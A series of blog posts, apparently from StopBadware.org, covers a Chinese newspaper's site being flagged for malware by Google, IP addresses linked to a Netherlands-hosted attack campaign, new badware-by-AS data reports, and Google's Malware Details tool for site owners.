It was reported today that a website of the official newspaper of the Chinese government, The People’s Daily, was flagged for malware by Google. The paper apparently complained that Google was maliciously flagging the site due to the paper’s criticism of Google Library. Google China denied the allegation, pointing out that the site was flagged by automated anti-malware systems, not based on content. As reported, the Google statement makes a small mistake in indicating that StopBadware.org provided the software for this automated system. In fact, Google’s Safe Browsing team developed the system themselves. For more information, see the relevant section of our FAQ.

The important lesson of this incident is that legitimate websites, whether operated by individuals or by large government-sponsored organizations, can fall victim to badware. Indeed, in China, where infection rates have historically been high, we hope this will serve as a wake-up call to website owners, hosting companies, and other parties about the need to secure their sites and platforms.

Last week I wrote about a new string of attacks we noticed pointing to servers in the Netherlands.  Over the weekend I found some public sources which show a more complete list of the attack sites which share the list of IP addresses.  Hosts-file.net has a decent compilation of each of the five addresses we listed:

16265 | 85.17.138.27 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
16265 | 85.17.237.5 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
15703 | 87.233.139.100 | 87.233.128.0/18 | TRUESERVER
15435 | 217.23.4.76 | 217.23.0.0/20 | KABELFOON
15435 | 217.23.5.27 | 217.23.0.0/20 | KABELFOON

Interestingly the domains don’t overlap in every instance so not every one of the domains listed are necessarily serving out badware.  Google, our data partner, says that over 12,000 websites have been infected which point back to one of the sites on these 5 IP addresses.  I’m still working on obtaining a full list of all the infected sites to analyze the distribution of the victims.  My assumption is that certain web hosts were harder hit than others but this is entirely speculation until I can analyze the full list.

If you have any information regarding these attacks please feel free to write us at contact <at> stopbadware <dot> org

We are pleased to unveil two new data reports, based on the data provided by Google and Sunbelt Software to our Badware Website Clearinghouse and information that we’ve pulled from Team Cymru’s public IP to ASN mapping service. One report lists the 50 Autonomous Systems (AS) hosting the greatest number of reported badware URLs. Set up like a stock ticker chart, it also displays the percent daily change in the number of URLs reported on each AS and the 52-week highs and lows for each AS. (Though the data starts in July, 2009, so it’s not yet reflecting 52 weeks.) See the Top 50 report here. There is also a link to it from the left-side navigation bar on the StopBadware.org home page.

The second report, available for any individual AS in our Clearinghouse, shows a graph of the number of reported badware URLs hosted by the AS over time. See an example here, search for an AS by number here, or click more info next to any AS in the Top 50 report for detail on that AS.

Both reports are updated daily and offer the ability to download the data in CSV format. We also wrote up a brief explanation of how to interpret the data in the reports.

We hope that both reports will be valuable to researchers, network operators, and others interested in observing web-based malware trends. Please let us know what you think by sending us a note at contact @ stopbadware dot org.

Security firm Comodo offers this self-promoting but rather humorous spoof of the cable TV show Intervention. In this case, the addict is a laptop that is addicted to malware. (Also available here.)

Google’s Webmaster Tools has, for quite some time, provided verified website owners with a partial list of pages from their site in which Google found badware during their scanning. Unfortunately, it was often frustrating to site owners to know that Google detected something on a page without knowing what the problem actually was. This frustration should be largely eliminated now that Webmaster Tools has added an experimental Labs feature called "Malware Details," which at least in some cases provides more information to the site owner, as shown in this screenshot from the blog post announcing the feature:

This is a big step forward and should make life much easier for the website owners whose sites have fallen victim to malware. Now, if we can just get Google to share this data with us, so we can better help users who have submitted review requests…

[Update: I just saw that the same blog post mentions another feature, Fetch as Googlebot, which will display a particular page as seen by Google’s web crawler. This also, as noted in the post, can be helpful in diagnosing malware, as it allows the site owner to see how Google’s view of the page differs from the user’s own view. One cause of such a difference is malware that responds differently to different agent or referrer strings in the http request.]